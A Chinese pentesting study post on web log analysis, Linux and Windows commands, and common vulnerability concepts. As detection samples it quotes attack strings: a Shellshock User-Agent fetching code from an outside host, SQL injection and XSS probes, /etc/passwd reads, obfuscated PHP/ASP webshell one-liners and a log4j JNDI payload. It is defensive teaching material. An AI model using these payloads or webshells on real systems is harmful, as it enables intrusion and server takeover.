【渗透测试】web日志、linux命令、常用知识

news2025/1/15 6:26:50

文章目录

  • web日志分析
    • 基础知识
      • 1. 编码
      • 2. 解码工具
      • 3. 数据提交方式
      • 4. 常见脚本语言
      • 5. 日志还原
    • 分析日志
      • 1. 分析日志的目的
      • 2. 攻击出现的位置
      • 3. 攻击常见的语句
      • 4. 攻击常见的特点
      • 5. 攻击日志分析流程
  • 相关linux命令
    • 常用命令
    • 系统状态检测命令
    • 工作目录切换命令
    • 文本文件编辑命令
    • 文件目录管理命令
    • 搜索命令
    • 渗透测试中常用的windows命令
  • 常用知识

web日志分析

基础知识

1. 编码

常见编码方式:

  • URL编码

特点:%数字

  • base64编码:base64是网络上最常见的用于传输8Bit字节代码的编码方式之一,要求把每三个8Bit的字节转换为四个6Bit的字节, 在email传输中,加密是肯定的,但是加密的目的不是让用户发送非常安全的Email。这种加密方式主要就是“防君子不防小人”。

特点:常以=结尾

  • 16进制编码

特点:以\x开头

  • Unicode编码:Unicode 在一个字符集中包含了世界上所有文字和符号,统一编码,来终结不同编码产生乱码的问题。

特点:以\u、\u+、&#x、&#开头

常见字符集(详解):

  • UTF-8(Unicode Tranformation Format):UTF-8的特点是对不同范围的字符使用不同长度的编码。
    在这里插入图片描述
  • UTF-7:UTF-7每个字节只用7位(最高位总是0)。这是为了一些特殊场景的兼容,因为最开始的字符编码(ASCII)只用了低七位,有些原始的邮件服务器则会自作聪明的去掉最高位编码再编码传输节省流量,UTF7就是为了兼容这种设备。
  • GB2312:GB2312 把每个汉字都编码成两个字节,第一个字节是高位字节,第二个字节是低位字节
    在这里插入图片描述
  • GBK:
    在这里插入图片描述
    在这里插入图片描述

GB18030和Unicode联系和区别:

  • GB18030 和 Unicode 相当于两套单独的编码体系,它们都对世界上大部分字符进行编码,赋予每个字符一个唯一的编号,只不过对于同一个字符,GB18030 和 Unicode 对应的编号是不一样的, 比如:汉字 “中” 字的 GB18030 编码是 0xD6D0, 对应的 Unicode 码元是 0x4E2D, 从这一点上可以认为 GB18030 是一种 Unicode 的转换格式
  • GB18030 既是字符集又是编码格式,即字符在字符集中的编号以及存储时进行编码用的编号是完全相同的,而 Unicode 仅仅是字符集,它只规定了字符的唯一编号,它的存储是用其他的编码格式的,比如 UTF8、UTF16 等等

Unicode和UTF-8的联系:

  • Unicode 统一了所有字符的编码,是一个 Character Set,也就是字符集,字符集只是给所有的字符一个唯一编号,但是却没有规定如何存储,一个编号为 65 的字符,只需要一个字节就可以存下,但是编号 40657 的字符需要两个字节的空间才可以装下,而更靠后的字符可能会需要三个甚至四个字节的空间。
  • 在存储和网络传输中,通常使用更为节省空间的变长编码方式 UTF-8,UTF-8 代表 8 位一组表示 Unicode 字符的格式,使用 1 - 4 个字节来表示字符。
  • UTF-8的编码形式如下:

U+ 0000 ~ U+ 007F: 0XXXXXXX
U+ 0080 ~ U+ 07FF: 110XXXXX 10XXXXXX
U+ 0800 ~ U+ FFFF: 1110XXXX 10XXXXXX 10XXXXXX
U+10000 ~ U+1FFFF: 11110XXX 10XXXXXX 10XXXXXX 10XXXXXX

2. 解码工具

http://www.mxcz.net/tools/Hex.aspx

  • converter
  • IBM appscan
  • winhex

3. 数据提交方式

一般通过三种方式提交参数:Get、Post、Cookie
在这里插入图片描述

4. 常见脚本语言

  • PHP

    <?php
    	...
    ?>
    
  • ASP/ASPX

    <%
    	...
    %>
    
  • JavaScript

    <script language="javascript">
    	...
    <script>
    
  • JSP

    <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*" %>
    <%
    	……
    %>
    

5. 日志还原

  1. 获取攻击者发送的数据
  • 防火墙:防火墙内置数据中心会记录数据包内容
  • 态势感知:态势感知外部威胁感知日志里面记录的数据包内容
  1. 编码还原(URL、base64、)

分析日志

1. 分析日志的目的

  • 误报:不是攻击而上报成攻击
  • 漏报:是攻击而没有防御
  • 日志分析可以判断是否误报或者漏报,可以溯源攻击行为

2. 攻击出现的位置

  • get、post请求报文的url字段

  • get、post请求报文的cookie字段

  • get、post请求报文的referer字段

  • post请求报文的表单字段

    url、cookie、referer、表单涉及到的攻击:xss攻击、SQL注入、命令执行、文件包含、目录穿越、webshell、信息泄露、网站扫描

  • get、post请求报文的user-agent字段

    user-agent涉及到的攻击:

    • 恶意爬虫:Python-urllib/2.6、Baidu-YunGuanCe-ScanBot(ce.baidu.com)
    • 扫描器:morfeus fucking scanner、Accept: acunetix/wvs
    • sql注入:sqlmap/1.0.8.15#dev (http://sqlmap.org)
    • xss攻击:'%22()%26%25<ScRiPt%20>prompt(961668)</ScRiPt>
    • 其它非常特殊攻击 :User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1
  • http报文负载

    http报文负载部分涉及到的攻击:

    • webshell(请求和应答方向都有可能)
    • 信息泄露(应答方向)

    总结:

    • 在http报文头部,出现了一些不应该出现的字段
    • url和post表单,referer、cookie出现了sql语句、系统命令、脚本代码(js代码、php代码)一般都不正常
    • 访问或者探测了一些敏感文件
    • 应答报文可能泄露一些系敏感信息的

3. 攻击常见的语句

  • sql注入:

    • 探测语句:
    • http://www.19cn.com/showdetail.asp?id=49 and 1=1
    • http://www.19cn.com/showdetail.asp?id=49 or 1=1
    • and char(124)%2Buser%2Bchar(124)=0(注入类型判断)
    • 权限判断
    • and user>0 用户名
    • and 1=(select IS_SRVROLEMEMBER('sysadmin')) 权限
    • and exists (select * from sysobjects) 数据库类型判断sqlserver
    • 查询数据
    • and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 查库名
    • and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 查表名
    • and (select count(字段名) from 表名)>0 猜字段
    • and (select top 1 len(username) from admin)=X 才字段值
    • http://localhost/mytest/sqlinject/?id=1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user union select猜解法
    • and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
  • XSS

    • <script>alert("xss")</script> 脚本
    • <img src="javascript:alert('xss');"> 属性
    • <img src="http://ha.ckers.org/xss.jpg">
    • <body onload=alert('xss')> 事件
    • <div style="background-image: url(javascript:alert('xss'))">
    • <style type="text/javascript">alert('xss');</style>
    • <style>@import'javascript:alert("xss")';</style>
    • <link rel="stylesheet" href="http://ha.ckers.org/xss.css">
  • 命令执行

    • GET /simple/tests/tmssql.php?do=phpinfo
    • GET /detail.php? id=/winnt/system32/cmd.exe?/c+dir+c:%5c
    • GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini
    • GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd
  • webshell一句话木马

    • <%eval request("sb")%>
    • <%execute request("sb")%>
    • <?php eval($_POST[sb]);?>
    • <?php @eval($_POST[sb]);?>
    • <?$_POST['sa']($_POST['sb']);?>
    • <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
    • <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("123"))%>
    • <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("c")%>(UTF-7编码格式的一句话木马)
    • <?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);?>
  • 信息泄露:

    • 配置文件访问
    • httpd.conf
    • htaccess
    • HTPASSWD
    • boot.ini
    • etc/passwd
    • php.ini
    • Web.xml
    • 特殊后缀
    • .mdb、 .sql
    • .bak、.sav、.old、.las
    • .tmp、.temp
    • .rar、.zip、.bz、gzip、tar
    • .conf、inc、ini、bat
    • .log、stats、statistics
    • Web.xml
    • 应答报文提示信息
    • 目录浏览
    • Parent Directory
    • Directory Listing For
    • Index of /
    • Welcome to the directory listing
    • 错误信息
    • 数据库错误信息
    • 程序错误信息
  • 网站扫描

    • 恶意爬虫:浏览器的user-agent字段一般都比较固定如:User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) ——IE 9.0;不是浏览器的user-agent,很可能就是爬虫
    • 扫描软件:user-agent字段或者单独标示自己的软件
    • 综合扫描器:wvs、appscan
    • 专用扫描器:sql注入

4. 攻击常见的特点

  1. 攻击一般都有一定的连续性,所以一段时间会产生多条日志,并且命中特征id是有一定分布的,不能是只命中某个特征。
  2. 攻击一般都会借助工具进行,同一个IP地址日志间隔较小,可能一秒中产生几条日志,明显不是人操作浏览器的行为。
  3. 攻击者可能会借助一定跳板,如果IP地址是国外的,攻击嫌疑较大。

5. 攻击日志分析流程

  • 基于攻击IP地址方法分析(适用于日志较多的情况)
  1. 找出一个明显的攻击行为的日志(根据攻击常见的特点)
  2. 根据该日志找出攻击源IP地址
  3. 筛选出针对该IP地址的日志,这种情况下基本都是攻击,没有误报
  4. 针对该IP地址,利用前面介绍的知识,就可以看出攻击者都发起了哪些攻击
  • 基于攻击方法分析(适用每类不太多的攻击)
  1. 看攻击语句,是否是明显攻击行为
  2. 如果能看出是明显的行为,就可以确定是攻击
  3. 如果不确定,还需要结合其他参数
  • 源IP地址:是否出现过其他类型可以明确的攻击行为
  • 攻击时间:如果半夜或者凌晨活动比较频繁,可以怀疑为攻击
  • 日志频率:一秒钟出现几次日志,可以怀疑为攻击
  • 攻击位置:国外的IP地址,可以怀疑为攻击
  • 报文语义分析:比如访问admin文件夹,可能是攻击行为
  • 误报(攻击和正常应用分不开)
  • 网站实现存在安全隐患
  • url参数实现时可以直接传递sql语句
  • url参数实现时可以直接传递js语句
  • url参数实现时用…/进行目录穿越访问文件
  • url参数实现时直接调用一些系统函数
  • url参数可以进行域名重定向
  • 系统配置存在安全隐患(比如开启了目录访问功能)
  • 用户应用比较特殊,这种情况可能会导致任何攻击的误报
  • 用户是一个论坛类应用,可以提交任何东西,包括文章
  • 用户是一个代码提交讨论网站,经常通过post表单提交代码

相关linux命令

常用命令

  • echo:输出命令

    echo hello
    echo $SHELL

  • data:显示时间

  • reboot:重启

  • poweroff:关机

  • ps:查看系统进程状态,格式:ps[参数]

    ps -aux

  • top:任务管理器,动态监视进程活动和系统负载等信息,每10秒刷新一次

  • pidof:查询某个指定服务进程的pid值,格式:pidof[参数][服务名称]

    pidof sshd

  • kill、killall:终止进程,格式:kill[参数][进程pid]

    kill 6625

系统状态检测命令

  • ifconfig:查询网络接口配置信息
  • uname:查看系统内核与系统版本等信息

    uname -a

  • uptime:查看系统的负载信息,包括当前系统时间,系统已运行时间,启用终端数量,平均负载值等信息
  • free:显示当前系统中内存的使用量信息

    free -h

  • who/whoami:查看当前登入主机的用户终端信息
  • last:查看所有系统的登录记录
  • history:显示历史执行过的命令

工作目录切换命令

  • pwd:显示用户所处的工作目录
  • cd:切换工作目录
  • ls:显示目录中的文件信息

文本文件编辑命令

  • cat:查看纯文本文件(内容较少的)

    cat 文件名
    cat -n 文件名

  • more:查看纯文本文件(内容较多的)

    more 文件名

  • head:查看纯文本文档的前N行

    head -n 行数 文件名

  • tail:查看纯文本文档的后N行

    tail -n 行数 文件名
    tail -f 文件名:实时查看最新文件

  • wc:统计指定文本的行数,字数,字节数

    wc -l 文件名:显示行数
    wc -w 文件名:显示单词数
    wc - c 文件名:显示字节数

  • stat:查看文件的具体存储信息和时间等信息

    stat 文件名

  • diff:比较多个文本文件的差异

    diff 文件1 文件2:打印两个文本不同之处
    diff 文件1 文件2 --brief :判断两个文本是否不同
    diff 文件1 文件2 -c:打印两个文本不同之处

文件目录管理命令

  • touch:创建空白文件或设置文件的时间

    touch 文件名
    touch -d "2020-05-04 12:00" a.txt:修改atime(读取时间)和mtime(修改时间)

  • mkdir:创建空白的目录

    mkdir 文件夹
    mkdir -p a/b/c:常见嵌套关系的文件目录

  • cp:复制文件或目录

    cp 源文件 目标文件

  • mv:剪切文件或重命名文件

    mv 源文件 目标文件:两个文件在同一目录下时可以理解为重命名

  • rm:删除文件或目录

    rm -f 文件名

  • file:查看文件的类型

    file 文件名

搜索命令

  • grep:在文本中执行关键词搜索

    grep -b 关键词 文件名:将可执行文件当作文本文件
    grep -c 关键词 文件名:仅显示找到的行数
    grep -i 关键词 文件名:忽略大小写
    grep -n 关键词 文件名:显示行号
    grep -v 关键词 文件名:反向选择——仅列出没有“关键词”的行

    echo "hello world" | grep -c world
    grep test *file :在后缀中带有file字样的文件中查找关键词test

  • find:按照指定条件查找文件

    find . -name "*.txt":查找当前目录下以.txt结尾的文件
    find . -name "[0-9]*"
    find /etc -name nginx.conf
    find /etc -perm 755 -type f > 文件:查找权限为755的文件,并将结果打印到文件中

  • 查找端口号

    lsof -i:端口号
    netstat -nltp | grep 端口号

    -a:显示本机所有连接和监听地端口
    -n:网络IP地址的形式,显示当前建立的有效连接和端口
    -r:显示路由表信息
    -s:显示按协议的统计信息
    -v:显示当前有效的连接
    -t:显示所有TCP协议连接情况
    -u:显示所有UDP协议连接情况
    -i:显示自动配置端口的状态
    -l:仅仅显示连接状态为listening的服务网络状态
    -p:显示pid/program name

渗透测试中常用的windows命令

  • ipconfig:查看ip地址和网卡配置
  • net user:查看当前系统的用户
  • neuser用户名:查看用户的基本信息
  • net user 用户名 密码 /add:添加新用户
  • net user 用户名 /del:删除用户
  • net user /domain:判断此用户是否是域成员
  • netstat -ano| findstr "80":查看80端口
  • tasklist | findstr "2448":查看2448进程
  • net group /domain:查看域中的组
  • net group "Domain Users" /domain:查看域组"Domain Users"中的用户成员
  • net localgroup:查看所有的本地组
  • net localgroup administrators:查看administrators组中有哪些用户
  • net localgroup administrators 用户名 /add:将用户添加到本地管理员组
  • whoami:查看当前用户及权限
  • systeminfo:查看计算机信息
  • ver:查看操作系统版本
  • tasklist /svc:查看当前计算机进程情况
  • netstat -ano:查看当前计算机进程情况
  • wmic product > ins.txt:查看安装软件以及版本路径等信息,输出到ins.txt

常用知识

  • 渗透测试流程

    1. 信息收集

    主要包括收集服务器信息、网站信息、域名信息、人员信息

    1. 漏洞探测

    主要包括网站功能点测试(文件上传漏洞、越权、目录遍历、注入、XSS、CSRF等)、扫描系统漏洞

    1. 渗透攻击

    根据探测的信息整理成漏洞合集表、分析并验证漏洞、寻找攻击路径进入内网扩大影响

    1. 后渗透

    内网信息收集、提权、横向移动、清除痕迹

    1. 整理信息形成报告

    整理渗透工具、收集信息、漏洞信息。

  • 信息收集的内容

    • 服务器信息(端口、服务、真实IP)
    • 网站信息(网站架构(操作系统、中间件、数据库、编程语言)、指纹信息、WAF、敏感目录、敏感文件、源码泄露、旁站查询、C段查询)
    • 域名信息(whois、备案信息、子域名)
    • 人员信息(姓名、职务、生日、联系电话、邮件地址)
  • 收集端口的作用,常见高危端口

    21 ftp
    22 ssh
    23 Telnet
    80/8080/8888
    1080 socks
    3389 RDP
    7001 Weblogic
    1521 Oracle
    1433 MSSQL
    3306 MySQL
    5432 PostgreSQL
    6379 Redis
    445 smb
    139 NetBios

  • SQL注入,XSS,CSRF、文件上传、SSRF漏洞原理和修复方法

    SQL注入:开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露。

    • 盲注:ascii,substr
    • 报错注入:updatexml,extractvalue,floor

    防御方法:

    1. 对输入进行严格的转义和过滤
    2. 使用预处理和参数化

    XSS:对输入和输出的控制不够严格,导致精心构造的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。

    防御方法:

    1. 输入做过滤,输出做转义。

    CSRF:用户访问网站受信任网站A,网站A返回给用户一个cookie,用户在没有登出网站A的情况下访问了攻击者的网站,攻击者返回攻击代码并携带用户的cookie向网站A发送一个请求,此时网站A会认为这是用户发起的请求,从而在不知不觉间攻击者利用了用户的权限执行了攻击代码。

    防御方法:

    1. 增加token验证

    文件上传:用户上传文件时,在后台并没有对上传的文件功能进行安全考虑或者采用了有缺陷的措施,导致攻击者可以通过一些手段来绕过安全措施从而上传一些恶意文件(如:一句话木马),从而通过该恶意文件的访问来控制整个web后台。

    防御方法:

    1. 通过服务器端对上传文件进行限制(后缀名过滤)
    2. 文件重命名(隐藏访问路径)
    3. 设置上传文件的访问权限)

    SSRF:由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

    防御方法:

    1. 设置白名单/黑名单;
    2. 限制访问权限
  • 工具使用(burpsuite、sqlmap等)

  • 熟悉的中间件及常见漏洞(shiro/fastjson/weblogic/log4j2等)

    shiro:用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

    fastjson:漏洞主要是因为autotype功能,这个功能本身是用于fastjson对JSON字符进行序列化和返序列化的,然后使用autotype功能进行序列化的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,只需要构造一个JSON字符,使用@type指定一个想要的攻击类库就可以实现攻击

    log4j2:log4j2框架下的lookup服务提供了{}字段解析功能,传进去的值会被直接解析,JNDI服务会请求远程服务来链接本地对象,这时候只用在{}里面调用JNDI服务即可反弹shell到指定服务器

    当用户输入信息时,应用程序中的log4j2组件会将信息记录到日志中
    假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp},log4j就会去解析该信息,通过jndi的lookup()方法去解析该URL:ldap:192.168.96.1:1099/exp
    解析到ldap,就会去192.168.61.129:1099的ldap服务找名为shell的资源,如果找不到就会去http服务中找
    在http中找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入
    攻击者就可以通过shell实现任意的命令执行,造成严重危害

  • 应急流程(定时任务)

    1. 收集客户机器信息以及样本,做好文件备份
    2. 判断安全事件的类型,是系统层面的(如挖矿病毒,后门木马),还是网络应用层面的(如webshell),或者是网络层面的(如断网、DDOS等),然后隔离机器
    3. 日志、用户、进程、启动项、样本,看到可疑的就删除掉,删除文件,打补丁,溯源
    4. 产出一份安全事件报告
  • linux命令

    • ps -aux:查看进程
    • netstat -antlp:查看端口
    • top:查看cpu使用情况

    查看ssh登录日志

    • /var/log/secure
    • /var/log/utmp
    • /var/log/wtmp
    • /var/log/lastlog
  • windows命令

    • tasklist:查看进程
    • netstat -an:查看端口

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/540801.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

BlueZ自动连接蓝牙耳机

问题&#xff1a;调好蓝牙之后&#xff0c;出现了一个客户问题&#xff0c;第一次连接好之后&#xff0c;开关机后没法自动连了。 解决方法&#xff1a; 针对这个情况&#xff0c;实际定位一下问题原因&#xff0c;原来是蓝牙耳机每次连时&#xff0c;都要求授权服务: Author…

sqlmap

1、Sqlmap简介&#xff1a; Sqlmap是一个开源的渗透测试工具&#xff0c;可以用来自动化的检测&#xff0c;利用SQL注入漏洞&#xff0c;获取数据库服务器的权限。它具有功能强大的检测引擎&#xff0c;针对各种不同类型数据库的渗透测试的功能选项&#xff0c;包括获取数据库…

Maven安装和配置(详细版)

Maven安装和配置 Maven安装1、安装链接&#xff1a;2、配置环境变量&#xff1a; Maven配置1、修改Maven仓库下载镜像及修改仓库位置&#xff1a;2、在Idea上配置Maven&#xff1a; 测试Maven安装能否安装jar包 Maven安装 1、安装链接&#xff1a; Maven – Download Apache …

使用A100 GPU搭建OBBDetection的运行环境

项目场景&#xff1a; 最近需要复现一篇目标检测论文的代码&#xff0c;文章提供了代码&#xff0c;因此自己根据仓库的说明尝试配置环境运行代码&#xff0c;但遇到了非常多的困难 问题描述 比较老的代码加上比较的GPU&#xff0c;导致了环境在配置的时候困难重重 OBBDetect…

xorm多表连接查询

SQL的连接查询可以将多个表的数据查询出来&#xff0c;形成一个中间表。在sql中为JOIN关键字。最常用的是LEFT JOIN,RIGHT JOIN,INNER JOIN,OUTER JOIN。 xorm框架是基于go语言的orm框架同样支持连接查询&#xff0c;由于xom及支持原生的sql查询也支持基于xorm的方法查询&…

openEuler用户软件仓(EUR)| 近期项目介绍

在操作系统的世界&#xff0c;软件包是一等公民&#xff0c;软件包的丰富程度和是否易于分发&#xff0c;一定程度上决定了操作系统用户和开发者的使用体验.。 EUR(openEuler User Repo)是openEuler社区针对开发者推出的个人软件包托管平台&#xff0c;目的在于为开发者提供一个…

【LeetCode训练营】用栈来实现队列+用队列来实现栈 详解

&#x1f4af; 博客内容&#xff1a;【LeetCode训练营】用栈来实现队列用队列来实现栈 详解 &#x1f600; 作  者&#xff1a;陈大大陈 &#x1f680; 个人简介&#xff1a;一个正在努力学技术的准前端&#xff0c;专注基础和实战分享 &#xff0c;欢迎私信&#xff01; …

Requests-翻页请求实现

翻页请求实现 继https://blog.csdn.net/ssslq/article/details/130747686之后&#xff0c;本篇详述在获取了页面第一页之后&#xff0c;如何获取剩余页的标题内容。 网页&#xff1a;https://books.toscrape.com 找规律 同样还是进行页面的检查&#xff0c;切到网络一栏&…

MySQL查询——joininunion

MySql多表查询的几种方法 连接查询——join自连接查询子查询——&#x1f6e0;in合并查询——Union 认识MySQL数据库的多表查询&#xff0c;在对大量数据进行查询时仅仅使用一些基本的SQL语句已经无法满足我们日益增长的需求&#xff0c;如果要对多表进行查询就不得不认识以下几…

【计算机网络基础】测试2 物理层

文章目录 判断题选择题辨析题应用题 判断题 现在的无线局域网常用的频段是2.8GHz和5.4GHz。 多模光纤只适合于近距离传输。√ 数据在计算机内部多采用串行传输方式&#xff0c;但在通信线路上多采用并行传输方式。 统计时分复用可以按需动态分配时隙。√ 相对于同步时分复用…

安装Ubuntu系统

## ubuntu 22.04 环境处理&#xff08;按顺序安装&#xff09; 1. 搜索并打开“windows 功能”窗口 勾上图示的2项&#xff0c;点确定安装&#xff0c;可能要求重启电脑 2. windows store 中 安装ubuntu 22.04 wsl 一定要登录Microsoft Store 账号再操作 3.在ubuntu安装node.j…

以SpringMVC入门案例分析服务器初始化过程、单次请求流程

文章目录 1&#xff0c;SpringMVC概述2&#xff0c;SpringMVC入门案例2.1 需求分析2.2 案例制作步骤1:创建Maven项目步骤2:补全目录结构步骤3:导入jar包步骤4:创建配置类步骤5:创建Controller类步骤6:使用配置类替换web.xml步骤7:配置Tomcat环境步骤8:启动运行项目步骤9:浏览器…

RabbitMQ --- 死信交换机(一)

前言 当我们在使用消息队列时&#xff0c;难免会遇到一些消息被拒绝&#xff0c;重复投递或者超时等异常情况。这些异常消息如果不被正确处理&#xff0c;将会阻碍整个消息系统的正常运行。而此时&#xff0c;死信交换机&#xff08;Dead Letter Exchange&#xff0c;简称DLX&…

【遇到dfs问题,点进来看看思路】【dfs本质之一 全排列思想解决大部分dfs】例题1.全排列 例题2.单词接龙

总之就是 在已知格线上&#xff0c;填充可用数据&#xff0c; 如果回退到A&#xff0c;那么把A之前所用数据&#xff0c;换一个&#xff0c;并且A之后的数据都重新填写 这就是全排列&#xff08;截取的最关键部分&#xff0c;往下看&#xff09; 这样的话&#xff0c;就是dfs的…

【节点边际电价】机组运行约束对机组节点边际电价的影响分析(Matlab代码实现)​

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…

2023年美国大学生数学建模竞赛F题绿色GDP解题全过程文档及程序

2023年美国大学生数学建模竞赛 F题 绿色GDP 原题再现&#xff1a; 背景   国内生产总值(GDP)可以说是衡量-一个国家经济健康状况的最知名和最常用的指标之一。它通常被用于确定一个国家的购买力和获得贷款的机会&#xff0c;为国家提出促进其gdp的政策和项目提供动力。GDP衡…

Springboot +Flowable,流程表单应用之外置表单(HTML形式)(一)

一.简介 整体上来说&#xff0c;我们可以将Flowable 的表单分为三种不同的类型&#xff1a; 动态表单 这种表单定义方式我们可以配置表单中每一个字段的可读性、可写性、是否必填等信息&#xff0c;不过不能定义完整的表单页面。外置表单 外置表单我们只需要定义一下表单的 k…

国考省考行测:求基期量,去年的量,增长率r小于6%化除为乘,否则直接相除

国考省考行测&#xff1a;求基期量&#xff0c;去年的量 2022找工作是学历、能力和运气的超强结合体! 公务员特招重点就是专业技能&#xff0c;附带行测和申论&#xff0c;而常规国考省考最重要的还是申论和行测&#xff0c;所以大家认真准备吧&#xff0c;我讲一起屡屡申论和…

AIGC产业研究报告2023——三维生成篇

定义 人工智能三维生成是指利用深度神经网络学习并生成物体或场景的三维模型&#xff0c;并在三维模型的基础上将色彩与光影赋予物体或场景使生成结果更加逼真。在应用中&#xff0c;生成物体或场景的三维模型称为三维建模&#xff0c;生成三维模型的色彩与光影称为三维渲染。…

在博客逮到一个阿里8年测试开发,聊过之后我悟了....

老话说的好&#xff0c;这人呐&#xff0c;一旦在某个领域鲜有敌手了&#xff0c;就会闲得疋虫疼。前几天我在上班摸鱼刷社区的时候认识了一位腾讯测试开发大佬&#xff0c;在阿里工作了8年&#xff0c;因为本人天赋比较高&#xff0c;平时工作也兢兢业业&#xff0c;现在企业内…